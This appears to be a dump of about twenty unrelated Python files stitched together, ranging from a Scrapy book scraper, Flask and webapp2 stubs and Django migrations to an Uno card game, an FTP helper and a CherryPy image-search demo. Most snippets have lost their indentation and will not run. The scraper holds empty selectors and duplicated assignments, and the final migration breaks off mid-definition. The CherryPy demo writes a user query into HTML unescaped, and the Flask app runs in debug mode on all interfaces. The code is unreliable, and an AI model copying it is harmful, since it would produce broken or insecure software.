sys.setdefaultencoding('utf-8')
bookListItem = bookLink()
book_list = response.css('ul.subject-list')
with open('bookLink.txt', 'w') as f:
for item in book_list.css('li.subject-item'):
                book_name = item.css('h2 a::text').extract_first().strip()
                book_link = item.css('h2 a::attr(href)').extract_first().strip()
                bookListItem['book_name'] = book_name
                bookListItem['book_link'] = book_link
                detail_url = response.urljoin(book_link)
                yield scrapy.Request(detail_url, self.book_parse)
                f.write(book_name + '\t' + book_link + '\n')
            next_page = response.css('span.next a::attr(href)').extract_first()
if next_page is not None:
next_page = response.urljoin(next_page)
yield scrapy.Request(next_page, callback=self.parse)
def book_parse(self, response):
reload(sys)
sys.setdefaultencoding('utf-8')
bookItem = book()
        bookItem['book_name'] = response.css('h1 span::text').extract_first().strip()
bookItem['ave_rate'] = response.css('').extract().strip()
bookItem['comment_num'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
bookItem['rate4'] = response.css('').extract().strip()
bookItem['rate3'] = response.css('').extract().strip()
bookItem['rate2'] = response.css('').extract().strip()
bookItem['rate1'] = response.css('').extract().strip()
bookItem['author'] = response.css('').extract().strip()
bookItem['original_name'] = response.css('').extract().strip()
bookItem['translator'] = response.css('').extract().strip()
bookItem['public_year'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
bookItem['rate5'] = response.css('').extract().strip()
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import webapp2
import jinja2
import os
env = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname("templates"))
)
class MainHandler(webapp2.RequestHandler):
def get(self):
main_template = env.get_template("templates/index.html")
self.response.write(main_template.render())
class ProjetoHandler(webapp2.RequestHandler):
def get(self):
main_template = env.get_template("templates/projeto.html")
self.response.write(main_template.render())
class AdoteHandler(webapp2.RequestHandler):
def get(self):
main_template = env.get_template("templates/faleconosco.html")
self.response.write(main_template.render())
class FaleConoscoHandler(webapp2.RequestHandler):
def get(self):
main_template = env.get_template("templates/faleconosco.html")
self.response.write(main_template.render())
app = webapp2.WSGIApplication([
    ('/', MainHandler),
('/adote', AdoteHandler),
('/faleconosco', FaleConoscoHandler),
('/projeto', ProjetoHandler)
], debug=True)
|
import numpy
import pandas as pd
import keras
from keras.models import Sequential
from keras.layers import Dense,Activation,Conv2D,MaxPool2D,Flatten,Dropout
from keras.utils import np_utils
from keras.models import load_model
import numpy as np
import os
import requests
from flask import Flask
app = Flask(__name__)
import tensorflow as tf
model = load_model("my_model.h5")
in_data = np.zeros(784)
prediction = model.predict(np.array([in_data]))
del model
@app.route("/")
def hello():
return "Hello World!"
if __name__ == "__main__":
app.run(debug=True,host='0.0.0.0')
|
from typing import Dict, List
from Controller.Utilities.GameStateInterface import GameStateSecondary
class GameState(GameStateSecondary):
    def __init__(self, game_dict: Dict[str, str or int] = None):
        # avoid a shared mutable default argument
        self.game_dict = game_dict if game_dict is not None else {}
self.game_dict_expected_keys = ["turnInfo", "timers", "gameObjects", "players", "annotations", "actions",
"zones"]
self.ti_dict_expected_keys = ["phase", "phase", "turnNumber", "activePlayer", "priorityPlayer",
"decisionPlayer", "nextPhase", "nextStep"]
def __str__(self):
return str(self.game_dict)
def get_full_state(self) -> Dict[str, str or int]:
return dict(self.game_dict)
def get_turn_info(self) -> Dict[str, str or int]:
turn_info_dict = None
full_state_dict = self.get_full_state()
if 'turnInfo' in full_state_dict.keys():
turn_info_dict = full_state_dict['turnInfo']
return turn_info_dict
def get_game_info(self) -> Dict[str, str or int]:
return self.get_full_state()['gameInfo']
def get_zone(self, zone_type: str, owner_seat_id: int = None) -> Dict[str, str or int]:
zones = self.get_full_state()['zones']
matching_zones = []
zone_to_return = None
for zone in zones:
if zone['type'] == zone_type:
matching_zones.append(zone)
if len(matching_zones) > 1:
for zone in matching_zones:
if zone['ownerSeatId'] == owner_seat_id:
zone_to_return = zone
elif len(matching_zones) == 1:
zone_to_return = matching_zones[0]
return zone_to_return
def get_annotations(self) -> List[Dict]:
return self.get_full_state()['annotations']
def get_actions(self) -> List[Dict]:
return self.get_full_state()['actions']
def get_players(self) -> List[Dict]:
return self.get_full_state()['players']
def get_game_objects(self) -> List[Dict[str, str or int]]:
return self.get_full_state()['gameObjects']
def is_complete(self):
is_complete = True
current_keys = self.game_dict.keys()
for expected_key in self.game_dict_expected_keys:
if expected_key not in current_keys:
is_complete = False
return is_complete
turn_info_keys = self.game_dict['turnInfo'].keys()
for expected_ti_key in self.ti_dict_expected_keys:
if expected_ti_key not in turn_info_keys:
is_complete = False
return is_complete
return is_complete
def __update_dict(self, dict_to_update: [str, str or int], dict_with_update: [str, str or int]):
for key in dict_with_update:
if key in dict_to_update.keys():
item_to_update = dict_to_update[key]
item_with_update = dict_with_update[key]
if isinstance(item_with_update, dict):
if isinstance(item_to_update, dict):
self.__update_dict(item_to_update, item_with_update)
else:
temp_dict = {}
self.__update_dict(temp_dict, item_with_update)
dict_to_update[key] = temp_dict
elif isinstance(item_with_update, int) or isinstance(item_with_update, str) or isinstance(
item_with_update, list):
dict_to_update[key] = dict_with_update[key]
else:
print("Uh oh something went wrong... :(")
else:
dict_to_update[key] = dict_with_update[key]
def update(self, updated_state: 'GameStateSecondary') -> None:
self.__update_dict(self.game_dict, updated_state.get_full_state())
|
# import numpy as np
# import scipy.optimize
# import matplotlib.pyplot as plt
# def sigmoid(x):
# g = 1. / (1 + np.e ** (-1 * x))
# g = np.reshape(g, [len(g),])
# return g
# def costFunction(theta, x, y):
# h = sigmoid(x.dot(theta))
# m = len(y)
# J = 1. / m * -1 * (np.transpose(y).dot(np.log(h)) + np.transpose(1 - y).dot(np.log(1 - h)))
# return J
# def gradient(theta, x, y):
# h = sigmoid(x.dot(theta))
# m,n = x.shape
# g = np.reshape(1. / m * (np.transpose(x).dot(h - y)), [n,])
# return g
# def predict(theta, x, y):
# result = sigmoid(x.dot(theta))
# result[np.where(result >= 0.5)] = 1
# result[np.where(result < 0.5)] = 0
# print(np.mean(np.float64(result ==y)))
# if __name__ == "__main__":
# data = np.loadtxt(fname = "ex2data1.txt", delimiter = ",")
# x = data[:, 0:2]
# y = data[:, 2]
# m,n = x.shape
# x = np.c_[np.ones([m,1]), x]
# initial_theta = np.zeros([n + 1, 1])
# result = np.reshape(scipy.optimize.fmin_bfgs(f = costFunction, x0 = initial_theta, fprime = gradient, args = (x,y)),[n+1, 1])
# # print(gradient(initial_theta, x, y))
# print(result)
# # predict(result, x, y)
# print(sigmoid(np.array([1, 45, 85]).dot(result)))
# pos = np.where(y == 1)
# neg = np.where(y == 0)
# plot1 = plt.scatter(x[pos, 1], x[pos, 2], marker = 'o', c = "r")
# plot2 = plt.scatter(x[neg, 1], x[neg, 2], marker = 'x', c = "b")
# plt.legend([plot1, plot2], ["Admitted", "Not admitted"], loc = "upper right")
# x = np.linspace(30, 100, 100)
# y = np.linspace(30, 100, 100)
# z = np.zeros([len(x), len(y)])
# for i in range(len(x)):
# for j in range(len(y)):
# z[i][j] = np.array([1, x[i], y[j]]).dot(result)
# z = np.transpose(z)
# plt.contour(x,y,z,[0,0.01],linewidth=2.0)
# plt.show()
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize as scop
def sigmoid(x):
g = 1. / (1 + np.e ** (-1 * x))
return g
def costFunction(theta, x, y):
h = sigmoid(x.dot(theta))
m = len(y)
J = 1. / m * -1 * (np.transpose(y).dot(np.log(h)) + np.transpose(1 - y).dot(np.log(1 - h)))
return J
def gradient(theta, x, y):
h = np.reshape(sigmoid(x.dot(theta)), [-1, 1])
m, n = x.shape
g = np.reshape(1. / m * (np.transpose(x).dot(h - y)), [n, ])
return g
if __name__ == "__main__":
data = np.loadtxt(fname = "ex2data1.txt", delimiter = ",")
x = data[:, 0:2]
y = data[:, 2]
m, n = x.shape
x = np.c_[np.ones([m, 1]), x]
y = np.reshape(y, [-1, 1])
initial_theta = np.zeros([n + 1, 1])
result = np.reshape(scop.fmin_bfgs(f = costFunction, x0 = initial_theta, fprime = gradient, args = (x, y)), [-1, 1])
print(result)
pos = np.where(y == 1)
neg = np.where(y == 0)
plot1 = plt.scatter(x[pos, 1], x[pos, 2], marker = "o", c = "b")
plot2 = plt.scatter(x[neg, 1], x[neg, 2], marker = "x", c = "r")
plt.legend([plot1, plot2], ["Admitted", "No-Admitted"], loc = "upper right")
x = np.linspace(30, 100, 100)
y = np.linspace(30, 100, 100)
z = np.zeros([len(x), len(y)])
for i in range(len(x)):
for j in range(len(y)):
z[i][j] = np.array([1, x[i], y[j]]).dot(result)
z = z.T
    plt.contour(x, y, z, [0, 0.01], linewidths=2.0)
plt.show()
|
#!/bin/python
# delete-dssstore.py
#
# A simple python script to delete .DS_Store files
#
# 3zbumban
# 2019
import os
import sys
import argparse
import time
from hurry.filesize import size
CWD = os.getcwd()
to_delete = ".DS_Store"
argumetnparser = argparse.ArgumentParser(description="Usage: delete-dsstore.py -p/--path <PATH> or: delete-dsstore.py -c/--cwd/--current-dir \nExample: delete-dsstore.py -p /Users/angelito")
argumetnparser.add_argument("-p", "--path", dest="target_path", type=str, required=False, help="the path you want to start from as a string \"C:\\example\\dir\\...\\...\"")
argumetnparser.add_argument("-c", "--current-dir", "--cwd", dest="use_cwd", action="store_true", help="add this flag to use the scripts dir as the starting point")
argumetnparser.add_argument("-v", "--verbose", dest="v", action="store_true", help="outputs every file that gets checked for debug purpose, slows down the script")
args, unknowns = argumetnparser.parse_known_args()
def welcome():
print("\n" * 5)
print("""
/$$ /$$ /$$$$$$$ /$$$$$$ /$$
| $$ | $$ | $$__ $$ /$$__ $$ | $$
/$$$$$$$ /$$$$$$ | $$ | $$ \ $$| $$ \__/ /$$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$
/$$__ $$ /$$__ $$| $$ | $$ | $$| $$$$$$ /$$_____/|_ $$_/ /$$__ $$ /$$__ $$ /$$__ $$
| $$ | $$| $$$$$$$$| $$ | $$ | $$ \____ $$ | $$$$$$ | $$ | $$ \ $$| $$ \__/| $$$$$$$$
| $$ | $$| $$_____/| $$ | $$ | $$ /$$ \ $$ \____ $$ | $$ /$$| $$ | $$| $$ | $$_____/
| $$$$$$$| $$$$$$$| $$ | $$$$$$$/| $$$$$$/ /$$$$$$$/ | $$$$/| $$$$$$/| $$ | $$$$$$$
\_______/ \_______/|__/ .|_______/ \______//$$$$$$|_______/ \___/ \______/ |__/ \_______/
|______/
by 3zbumban
""")
def main():
welcome()
try:
if(args.use_cwd):
path = CWD
print("[i] using scripts dir: {}".format(path))
elif(args.target_path):
if(os.path.isdir(args.target_path)):
path = args.target_path
else:
print("[e] given path is not a dir\n[i] did you use a backslash (\"\\\") to much?")
sys.exit(-1)
else:
print("[i] exit no path given...")
sys.exit(0)
if input("[i] your path to clean: {} \n[?] do you want to start? (y/n) ".format(path)) == "y":
start = time.time()
# 1. Check if parameter is a dir
if os.path.isdir(path):
# 2. Clear file counter
i = 0
acc_f_size = 0
# 3. walks all files in the directory
for root, sub, files in os.walk(path):
for file in files:
if(args.v):
print("[i] checking: {}".format(os.path.abspath(os.path.join(root, file))))
# 4. Checks if exists .DS_Store file
if file == to_delete:
# 5. Get full path of current .DS_Store file
fullpath = os.path.abspath(os.path.join(root, file))
# get file size
acc_f_size += os.path.getsize(fullpath)
print("[i] Deleting: \"{}\" \n[i] deleted: {}".format(fullpath, size(acc_f_size)))
# 6. Remove file
os.remove(fullpath)
i += 1
# 7. print result
end = time.time()
print("\n\n\n[i] number of deleted files: {} \n[i] total filesize: {} \n[i] time elapsed: {:4.4f}sec".format(i, size(acc_f_size), (end - start) % 60))
else:
sys.exit(0)
else:
print("[i] you choose to abort the script...")
sys.exit(0)
except KeyboardInterrupt:
end = time.time()
print("[i] KeyboardINterrupt, aborting")
print("\n\n\n[i] number of deleted files: {} \n[i] total filesize: {} \n[i] time elapsed: {:4.4f}sec".format(i, size(acc_f_size), (end - start) % 60))
if __name__ == "__main__":
main()
|
import numpy as np
import tensorflow as tf
from app.ds.graph.preprocessed_graph import Graph
from app.model.params import SparseModelParams
from app.utils.constant import TRAIN, LABELS, FEATURES, SUPPORTS, MASK, VALIDATION, TEST, DROPOUT, GCN, \
FF, GCN_POLY
class DataPipeline():
'''Class for managing the data pipeline'''
def __init__(self, model_params, data_dir, dataset_name):
self.graph = None
self._populate_graph(model_params, data_dir, dataset_name)
self.data_dir = data_dir
self.dataset_name = dataset_name
self.model_params = model_params
self.num_elements = -1
self.feature_size = self.graph.features.shape[1]
self.node_size = self.graph.features.shape[0]
self.label_size = self.graph.labels.shape[1]
self.support_size = self.model_params.support_size
self.supports = []
self.placeholder_dict = {}
self.train_feed_dict = {}
self.validation_feed_dict = {}
self.test_feed_dict = {}
self._populate_feed_dicts()
def _populate_graph(self, model_params, data_dir, dataset_name):
self.graph = Graph(model_name=model_params.model_name, sparse_features=model_params.sparse_features)
self.graph.read_data(data_dir=data_dir, dataset_name=dataset_name)
def _set_placeholder_dict(self):
'''
Logic borrowed from
https://github.com/tensorflow/tensorflow/blob/r1.4/tensorflow/examples/tutorials/mnist/fully_connected_feed.py'''
labels_placeholder = tf.placeholder(tf.int32, shape=(None, self.label_size), name=LABELS)
features_placeholder = tf.placeholder(tf.float32, shape=(None, self.feature_size), name=FEATURES)
if (self.model_params.sparse_features):
features_placeholder = tf.sparse_placeholder(tf.float32, shape=(None, self.feature_size), name=FEATURES)
mask_placeholder = tf.placeholder(tf.float32, name=MASK)
# For disabling dropout during testing - based on https://stackoverflow.com/questions/44971349/how-to-turn-off-dropout-for-testing-in-tensorflow
dropout_placeholder = tf.placeholder_with_default(0.0, shape=(), name=DROPOUT)
support_placeholder = []
for i in range(self.support_size):
support_placeholder.append(tf.sparse_placeholder(tf.float32, name=SUPPORTS + str(i)))
self.placeholder_dict = {
FEATURES: features_placeholder,
LABELS: labels_placeholder,
SUPPORTS: support_placeholder,
MASK: mask_placeholder,
DROPOUT: dropout_placeholder
}
def _prepare_feed_dict(self, labels, features, mask_indices, dropout):
y = np.zeros(labels.shape)
y[mask_indices,:] = labels[mask_indices,:]
placeholder_dict = self.placeholder_dict
feed_dict = {
placeholder_dict[LABELS]: y,
placeholder_dict[FEATURES]: features,
placeholder_dict[MASK]: map_indices_to_mask(indices=mask_indices, mask_size=self.node_size),
placeholder_dict[DROPOUT]: dropout
}
for i in range(self.support_size):
feed_dict[placeholder_dict[SUPPORTS][i]] = self.supports[i]
return feed_dict
def _prepare_data_node_classifier(self, dataset_splits, shuffle_data=False):
self._set_placeholder_dict()
features = self.graph.features
labels = self.graph.labels
supports = self.graph.compute_supports(model_params=self.model_params)
if (self.model_params.sparse_features):
self.num_elements = features.nnz
if(self.graph.preprocessed):
train_index, val_index, test_index = self.graph.read_data(dataset_name=self.dataset_name, data_dir=self.data_dir)
else:
if(shuffle_data):
shuffle = np.arange(self.node_size)
np.random.shuffle(shuffle)
features = features[shuffle]
labels = labels[shuffle]
train_index, val_index, test_index = self.graph.get_node_mask(dataset_splits=dataset_splits)
features = convert_sparse_matrix_to_sparse_tensor(features)
self.supports = list(
map(
lambda support: convert_sparse_matrix_to_sparse_tensor(support), supports
)
)
return [[labels, features],
[train_index, val_index, test_index]]
def _prepare_data(self, dataset_splits, shuffle_data=False):
if(self.model_params.model_name in set([GCN, GCN_POLY, FF])):
return self._prepare_data_node_classifier(dataset_splits=dataset_splits,
shuffle_data=shuffle_data)
else:
return None
def _populate_feed_dicts(self, dataset_splits=[140, 500, 1000]):
'''Method to populate the feed dicts'''
[[labels, features],
[train_index, val_index, test_index]] = self._prepare_data(dataset_splits=dataset_splits)
self.train_feed_dict = self._prepare_feed_dict(labels=labels,
features=features,
mask_indices=train_index,
dropout=self.model_params.dropout)
self.validation_feed_dict = self._prepare_feed_dict(labels=labels,
features=features,
mask_indices=val_index,
dropout=0)
self.test_feed_dict = self._prepare_feed_dict(labels=labels,
features=features,
mask_indices=test_index,
dropout=0)
def get_feed_dict(self, mode=TRAIN):
if mode == TRAIN:
return self.train_feed_dict
elif mode == VALIDATION:
return self.validation_feed_dict
elif mode == TEST:
return self.test_feed_dict
else:
return None
def get_placeholder_dict(self):
'''Method to populate the feed dicts'''
return self.placeholder_dict
def get_sparse_model_params(self):
return SparseModelParams(
num_elements=self.num_elements,
feature_size=self.feature_size
)
def map_indices_to_mask(indices, mask_size):
'''Method to map the indices to a mask'''
mask = np.zeros(mask_size, dtype=np.float32)
mask[indices] = 1.0
return mask
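# Hypothetical quick check (not part of the original file):
# map_indices_to_mask([0, 2], 4) -> array([1., 0., 1., 0.], dtype=float32)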
def convert_sparse_matrix_to_sparse_tensor(X):
'''
code borrowed from https://stackoverflow.com/questions/40896157/scipy-sparse-csr-matrix-to-tensorflow-sparsetensor-mini-batch-gradient-descent
'''
coo = X.tocoo()
indices = np.mat([coo.row, coo.col]).transpose()
return tf.SparseTensorValue(indices, coo.data, coo.shape)
|
from enum import Enum
# Enumerator to store color value
class Color(Enum):
RED = 1
BLUE = 2
YELLOW = 3
GREEN = 4
# Greater than and less than compare the Color Enumerator value
def __gt__(self, other):
if other == None:
return False
return self.value > other.value
def __lt__(self, other):
if other == None:
return True
return self.value < other.value
# Card is basic uno playing card
class Card:
def __init__(self, value, color):
# Color and value (number) of card
self.color = color
self.value = value
    # action() is called whenever the card is played. It handles special behaviour for
    # cards like Wild and Skip and returns a dict of attributes for the game controller
    # to apply. A plain numbered card has no special behaviour, so it returns an empty dict.
    def action(self):
        return {}
def __str__(self):
return "{:<8} {:<15}".format(self.color.name, self.value)
# Greater than and less than compare by color first then by value.
def __gt__(self, other):
if self.color == other.color:
return self.value > other.value
return self.color > other.color
def __lt__(self, other):
if self.color == other.color:
return self.value < other.value
return self.color < other.color
# Skip card
class Skip(Card):
def __init__(self, color):
super().__init__(-1, color)
# Inform the game controller to skip the next turn
def action(self):
return {"skip_next_player": True}
def __str__(self):
return "{:<8} SKIP".format(self.color.name)
# Reverse card
class Reverse(Card):
def __init__(self, color):
super().__init__(-1, color)
# Inform the game controller to reverse the direction of play
def action(self):
return {"reverse_direction_of_play": True}
def __str__(self):
return "{:<8} REVERSE".format(self.color.name)
class PlusTwo(Card):
def __init__(self, color):
super().__init__(-1, color)
# Inform game controller to skip the next player and have the next player draw 2 cards
def action(self):
return {"skip_next_player": True, "draw_next_player": 2}
def __str__(self):
return "{:<8} PLUS TWO".format(self.color.name)
class Wild(Card):
def __init__(self):
super().__init__(-1, Color.RED)
# Prompt user to set color for wild card
def _set_color_(self):
        self.color = None
while self.color == None:
color_choice = input("Enter a color for the wild card (R/G/B/Y): ").lower()
if color_choice == "r":
self.color = Color.RED
elif color_choice == "g":
self.color = Color.GREEN
elif color_choice == "b":
self.color = Color.BLUE
elif color_choice == "y":
self.color = Color.YELLOW
# Have user set the color of the Wild card
def action(self):
self._set_color_()
return {}
def __str__(self):
return "WILD"
class WildPlusFour(Wild):
def __str__(self):
return "WILD PLUS 4"
# Set color and inform game controller to have the next player draw 4 cards
def action(self):
self._set_color_()
return {"draw_next_player": 4}
|
import datetime
import ftplib
from prettytable import PrettyTable
class ExtraccionFtp:
def __init__(self,host,usuario,clave):
self.host = host
self.usuario = usuario
self.clave = clave
self.ftp = ftplib.FTP(self.host)
def login(self):
try:
self.ftp.login(self.usuario,self.clave)
except Exception as e:
self.full(str(e),"login")
def full(self,msg, level ):
str_dattime = str(datetime.datetime.now())
print('{0} - {1} - {2}'.format( str_dattime, level, msg))
def close(self):
try:
self.ftp.quit()
except Exception as e:
self.full(str(e),"close")
def void_ls_comand(self,path_dir):
try:
self.ftp.cwd(path_dir)
self.ftp.dir()
except Exception as e:
            self.full(str(e), 'void_ls_comand')
def size_fmt(self,num,suffix='B'):
try:
for unit in ['','K','M','G','T','P','E','Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num,unit,suffix)
num /= 1024.0
return "%.1f%s%s" % (num,'Yi',suffix)
except Exception as e:
self.full(str(e),"size_fmt")
    def get_datetime_format(self, date_time):
        date_time = datetime.datetime.strptime(date_time, "%Y%m%d%H%M%S")
        return date_time.strftime("%Y-%m-%d %H:%M:%S")
def is_file(self,filename):
current = self.ftp.pwd()
try:
self.ftp.cwd(filename)
except:
self.ftp.cwd(current)
return True
self.ftp.cwd(current)
return False
    def download_file(self, path_remote, path_local, file_name):
        try:
            self.ftp.cwd(path_remote)
            with open(path_local + '/' + file_name, 'wb') as new_file:
                self.ftp.retrbinary("RETR " + file_name, new_file.write)
            return "success"
        except Exception as e:
            self.full(str(e), "download_file")
            return str(e)
    def getTablePretty(self, header, rows):
table = PrettyTable(header)
for row in rows:
table.add_row(row)
return table
def get_content_nlst(self,path_dir):
try:
array_files = []
self.ftp.cwd(path_dir)
for file_name in self.ftp.nlst():
if(self.is_file(file_name)):
size = self.ftp.size(file_name)
size = self.size_fmt(size)
object = {'size':size,'name':file_name}
array_files.append(object)
return array_files
except Exception as e:
self.full(str(e),"get_content_nlst")
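# --- Illustrative sketch (not part of the original module) ---
# A hypothetical session showing how ExtraccionFtp might be used; the host,
# credentials and remote path are made-up placeholders.
if __name__ == '__main__':
    ftp = ExtraccionFtp('ftp.example.com', 'usuario', 'clave')
    ftp.login()
    for entry in ftp.get_content_nlst('/remote/dir') or []:
        print('{0} {1}'.format(entry['size'], entry['name']))
    ftp.close()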
|
#!/usr/bin/python
# Sum all integers below 28124 that cannot be written as the sum of two
# abundant numbers (Project Euler problem 23).
def divisors(n):
    # Returns True if n is abundant, i.e. the sum of its proper divisors exceeds n.
    count = 0
    for j in range(int(n / 2), 0, -1):
        if n % j == 0:
            count += j
        if count > n:
            return True
    return count > n
total = 0
arr = []
for i in range(2, 28124):
    if divisors(i):
        arr.append(i)
d = {}
for i in range(0, len(arr)):
    for j in range(i, len(arr)):
        d[arr[i] + arr[j]] = True
for i in range(0, 28124):
    if i not in d:
        total += i
print(total)
|
from albus import fields
def step_0001(m):
m.create(
'Author', [
('name', fields.StringField()),
('initials', fields.StringField(size=fields.TINY)),
('rank', fields.IntegerField()),
('birthdate', fields.DateTimeField()),
]
)
m.create(
'Book', [
('author', fields.IntegerField()),
('title', fields.StringField(size=fields.BIG)),
]
)
m.reference('Book', 'author', 'Author')
def step_0002(m):
m.add(
'Book', [
('pages', fields.IntegerField()),
]
)
|
# Generated by Django 3.1.7 on 2021-03-07 04:03
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0015_auto_20210307_0134'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='answers',
),
migrations.AddField(
model_name='answer',
name='post',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='answers_post', to='api.post'),
),
]
|
from class_Student import Student
# Instantiate class with 5 students
student0 = Student("Alan", 29, 4.0)
student1 = Student("Benji", 27, 2.0)
student2 = Student("Dave", 29, 3.4)
student3 = Student("Dave", 29, 3.4)
student4 = Student("Edgar", 23, 3.1)
# Create test array of 5 students
student_array = [student0, student1, student2, student3, student4]
print("\n")
print("Initialized student array...\n")
# Demonstrates method: __str__
print("Demonstrates method: __str__")
print(str(student0))
print(str(student1))
print(str(student2))
print(str(student3))
print(str(student4))
print("\n")
# Demonstrates method: __lt__
print("Demonstrates method: __lt__")
print(student0.__lt__(student1))
print(student1.__lt__(student4))
print(student2.__lt__(student1))
print(student3.__lt__(student2))
print(student4.__lt__(student3))
print("\n")
# Demonstrates method: __eq__
print("Demonstrates method: __eq__")
print(student0.__eq__(student1))
print(student1.__eq__(student4))
print(student2.__eq__(student3))
print(student3.__eq__(student2))
print(student4.__eq__(student3))
print("\n")
# Demonstrates method: __hash__
print("Demonstrates method: __hash__")
print(student0.__hash__())
print(student1.__hash__())
print(student2.__hash__())
print(student3.__hash__())
print(student4.__hash__())
print("\n")
# (b) Write test code that exercises these methods using sorted() and dict()
# Test 1:
def myFn(s):
return s.gpa
print("[Test 1] Returns students by lowest to highest GPA using sorted():")
test1 = sorted(student_array, key=myFn)
for student in test1:
print(student.name + ', ' + str(student.gpa))
print("\n")
# Test 2:
print("[Test 2] Returns students whose GPA is GTE to 3.0 using sorted() and dict():")
dict1 = {}
for student in student_array:
if student.gpa >= 3.0:
dict1.update({ student.name: student.gpa})
dict1 = sorted(dict1, reverse=True)
print(dict1)
print("\n")
# Test 3:
print("[Test 3] Determines if student has 4.0 GPA using __hash__():")
list2 = []
for student in student_array:
if student.gpa == 4.0:
list2.append(student.__hash__())
for student in student_array:
if student.__hash__() in list2:
print(student.name + ' has a perfect GPA!')
print("\n")
# (c) Sort students in order of increasing GPA using a lambda expression
print("[Test 4] Sorts students in order of increasing GPA using a lambda expression:")
test3 = sorted(student_array, key=lambda student: student.gpa)
for lambda_student in test3:
print(lambda_student.name + ', ' + str(lambda_student.gpa))
print("\n...End of tests")
|
/Users/daniel/anaconda/lib/python3.6/__future__.py
|
import cherrypy, os, urllib, pickle
from n6_searching_images import imagesearch
from n6_searching_images.vocabulary import Vocabulary
import random
class SearchDemo(object):
def __init__(self):
# load list of images
with open('ukbench_imlist.pkl', 'rb') as f:
self.imlist = pickle.load(f)
self.nbr_images = len(self.imlist)
self.ndx = list(range(self.nbr_images))
# load vocabulary
with open('vocabulary.pkl', 'rb') as f:
self.voc = pickle.load(f)
# set max number of results to show
self.maxres = 15
# header and footer html
self.header = """
<!doctype html>
<head>
<title>Image search example</title>
</head>
<body>
"""
self.footer = """
</body>
</html>
"""
def index(self, query=None):
self.src = imagesearch.Searcher('test.db', self.voc)
html = self.header
html += """
<br />
Click an image to search. <a href='?query='>Random selection</a> of images.
<br /><br />
"""
if query:
# query the database and get top images
res = self.src.query(query)[:self.maxres]
for dist, ndx in res:
imname = self.src.get_filename(ndx)
html += "<a href='?query=" + imname + "'>"
html += "<img src='" + imname + "' width='100' />"
html += "</a>"
else:
# show random selection if no query
random.shuffle(self.ndx)
for i in self.ndx[:self.maxres]:
imname = self.imlist[i]
html += "<a href='?query=" + imname + "'>"
html += "<img src='" + imname + "' width='100' />"
html += "</a>"
html += self.footer
return html
index.exposed = True
config = {
'global':{
'server.socket_host': "127.0.0.1",
'server.socket_port': 8080,
'server.thread_pool': 50,
'tools.sessions.on': True
},
'/': {
'tools.staticdir.root': os.path.abspath(os.path.dirname(__file__)), # must be absolute path
'tools.staticdir.on': True,
'tools.staticdir.dir': ''
}
}
cherrypy.quickstart(SearchDemo(), '/', config=config)
|
# 27. Merge the Tools!
# 28. itertools.product()
# > import itertools
# > Permutations: permutations(list, k); combinations: combinations(list, k), where k is how many items to pick.
# > Cartesian product of several lists: product(list, list, ...); unpacking with *list also enumerates every combination of the strings inside the list.
# > product(list, repeat=2) == product(list, list); the repeat argument repeats the given iterable.
# > The results are tuples, so wrap them in list() if you need lists.
# 29. collections.Counter()
# > collections.Counter counts occurrences in a list, like the built-in count(),
# but unlike count() it returns a dict-like Counter object with the items as keys and their counts as values (usable just like a dict).
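# A small runnable illustration (not part of the original notes) of the
# itertools.product and collections.Counter behaviour described above:
from itertools import product
from collections import Counter
print(list(product([1, 2], ['a', 'b'])))  # [(1, 'a'), (1, 'b'), (2, 'a'), (2, 'b')]
print(list(product([1, 2], repeat=2)))    # same as product([1, 2], [1, 2])
c = Counter("banana")                     # counts: a -> 3, n -> 2, b -> 1
print(c['a'])                             # 3, usable just like a dict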
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param A : head node of linked list
# @return an integer
def lPalin(self, A):
if not A.next:
return 1
vals = [A.val]
current = A.next
while current:
vals.append(current.val)
current = current.next
current = A
        for i in range(len(vals) // 2):
if current.val != vals[-i - 1]:
return 0
current = current.next
return 1
|
import subprocess, os
images = os.listdir('./img')
#qss = os.listdir('./qss')
f = open('resource.qrc', 'w+')
f.write(u'<!DOCTYPE RCC>\n<RCC version="1.0">\n<qresource>\n')
for item in images:
f.write(u'<file alias="img/'+ item +'">img/'+ item +'</file>\n')
#f.write(u'<file alias="icons/'+ item +'">icons/'+ item +'</file>\n')
#for item in qss:
# f.write(u'<file alias="qss/'+ item +'">qss/'+ item +'</file>\n')
f.write(u'</qresource>\n</RCC>')
f.close()
pipe = subprocess.Popen(r'pyrcc4 -py3 -o Resource_rc.py resource.qrc', stdout = subprocess.PIPE, stdin = subprocess.PIPE, stderr = subprocess.PIPE, creationflags=0x08)
|
import unittest
from katas.beta.lightswitches import lightswitch
class LightswitchTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(lightswitch(3), 1)
def test_equals_2(self):
self.assertEqual(lightswitch(4), 2)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2019-11-09 06:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('email', models.EmailField(max_length=100, unique=True)),
('staff', models.BooleanField(default=True)),
